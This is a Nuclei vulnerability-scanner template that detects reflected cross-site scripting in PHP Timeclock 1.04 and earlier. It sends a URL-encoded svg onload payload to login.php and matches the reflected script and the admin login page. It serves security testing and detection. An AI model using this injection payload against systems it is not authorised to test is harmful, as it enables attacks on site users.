nuclei-templates/vulnerabilities/other/php-timeclock-xss.yaml

33 lines
748 B
YAML

id: php-timeclock-xss
info:
name: PHP Timeclock 1.04 Cross-Site Scripting
author: pikpikcu
severity: medium
description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities
reference:
- https://www.exploit-db.com/exploits/49853
tags: xss,php,timeclock,edb
requests:
- method: GET
path:
- "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert`{{randstr}}`>"
- "PHP Timeclock Admin Login"
part: body
condition: and
- type: word
words:
- "text/html"
part: header